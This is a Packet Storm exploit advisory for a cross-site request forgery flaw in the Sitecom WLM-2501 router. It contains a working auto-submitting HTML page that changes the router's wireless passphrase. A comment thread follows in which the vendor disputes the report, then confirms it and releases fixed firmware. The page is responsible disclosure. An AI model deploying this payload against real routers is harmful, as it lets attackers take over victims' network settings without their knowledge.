what you don't know can hurt you

Sitecom WLM-2501 Cross Site Request Forgery

Sitecom WLM-2501 Cross Site Request Forgery
Posted Mar 14, 2012
Authored by Ivano Binetti

Sitecom WLM-2501 suffers from a change wireless passphrase cross site request forgery vulnerability.

tags | exploit, csrf
MD5 | 855ffffc897003bd05ad527d04c7026d

Sitecom WLM-2501 Cross Site Request Forgery

Change Mirror Download
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Sitecom WLM-2501 Change Wireless Passphrase
# Date : 13-03-2012
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Vendor site : http://www.sitecom.com/wireless-modem-router-300n/p/859
# Version : WLM-2501
# Tested on : WLM-2501 (All Sitecom WL series might be is affected by these vulnerabilities)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/sitecom-wlm-2501-change-wireless.html
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
2)Vulnerability Description
3)Exploit

+--------------------------------------------------------------------------------------------------------------------------------+

1)Introduction
Sitecom WLM-2501 is a Wireless Modem Router 300N which uses a web management interface - listening to default on tcp/ip port 80
- and "admin" as default administrator. His default ip address is 192.168.0.1.


2)Vulnerability Description
The web interface of this router is affected by muktiple CSRF vulnerabilities which allows to change router parameters and
- among other things - to change Wireless Passphrase.

3)Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formWlEncrypt">
<input type="hidden" name="wlanDisabled" value="OFF"/>
<input type="hidden" name="method" value="6"/>
<input type="hidden" name="wpaAuth" value="psk"/>
<input type="hidden" name="pskFormat" value="0"/>
<input type="hidden" name="pskValue" value="newpassword"/>
<input type="hidden" name="submit-url" value="%2Fwlwpa.asp"/>
<input type="hidden" name="save" value="Apply"/>
</form>
</body>
</html>


+--------------------------------------------------------------------------------------------------------------------------------+

Comments (8)

RSS Feed Subscribe to this comment feed
sitecom

Dear Mr. Binetti,

We checked your claim but could not reproduce this, since the router immediately requests the admin password, which is a unique randomly generated password per router. Also, in order to execute the script you need to be connected to the router, for which you already need to know the WiFi password (which is also a unique randomly generated password per router) or be physically connected with a cable.

If you think otherwise please contact us on twitter via @Sitecom_nl

Kind regards,

Sitecom Europe BV
R&D Department

Comment by sitecom
2012-03-14 11:00:22 UTC | Permalink | Reply
ibinetti

Dear Sitecom Europe BV,
this is a CSRF (Cross Site Request Forgery) vulnerability. It means that malicious peolpe can create a special crafted web page - containing the code which I've inserted in my exploit - in order to change wireless passphrase when an authenticated administrator bwoses that crafted web page.

For any question don't hesitate to contact me. In my blog you can find all my references.
Best regards,
Ivano Binetti

Comment by ibinetti
2012-03-14 15:03:03 UTC | Permalink | Reply
sitecom

Dear Mr. Binetti,

Thank you for your additional information, we created a webpage containing your code.
We then logged in on the WLM-2501 User Interface as admin and then in the same session visited the webpage that contained your code.

This resulted in a pop-up with the standard log-in screen that requested the login-name and password. We sent a screenshot to your Twitter account.

Thank you again for mentioning this but we are confident that the issue mentioned by you is not a valid one.

Kind regards,

Sitecom Europe BV
R&D Department

Comment by sitecom
2012-03-14 16:27:26 UTC | Permalink | Reply
ibinetti

Dear Sitecom Europe BV,
I've seen your screenshot and your test result is very strange because, also if the exploit does not work, you should not insert again authentication credential if you're logged in web managent interface. With my exploit your browser is only performing a http POST request. Why should the router ask you user/password if you are already logged-in?

The main concept behind this exploit is that Sitecom WLM-2501 300N does not use anti-CSRF token.

When I'll be able to retest the exploit I will send you my feedback.

Best Regards,
Ivano Binetti

Comment by ibinetti
2012-03-14 17:18:02 UTC | Permalink | Reply
ibinetti

The vulnerability which allows to change wireless passphrase has been confirmed and I've found new CSRF vulnerabilities in order to:

Disable Mac Filtering
Disable/Modify IP/Port Filtering
Disable/Modify Port Forwarding
Disable/Modify Wireless Access Control
Disable Wi-Fi Protected Setup
Disable/Modify URL Blocking Filter
Disable/Modify Domain Blocking Filter
Disable/Modify IP Address ACL
Enable/Modify Remote Access (also on WAN interface)

To know more details about above vulnerabilities:
packetstormsecurity.org/files/111115/Siteco…

Comment by ibinetti
2012-03-23 11:24:21 UTC | Permalink | Reply
ibinetti

Security Focus has confirmed these vulnerabilities and assigned Bugtraq ID 52700 www.securityfocus.com/bid/52700

Comment by ibinetti
2012-03-26 12:59:08 UTC | Permalink | Reply
sitecom

Dear Mr. Binetti,

We've successfully fixed the above mentioned CSRF Vulnerability issue in firmware 1.03 for the WLM-2501. This firmware has been made available on our website and in the automatic firmware upgrade function that is implemented in the WLM-2501.

Kind regards,

Sitecom Europe BV
R&D Department

Comment by sitecom
2012-03-30 10:02:34 UTC | Permalink | Reply
ibinetti

Great work, great company!

Best regards,
Ivano Binetti

Comment by ibinetti
2012-03-30 14:27:41 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close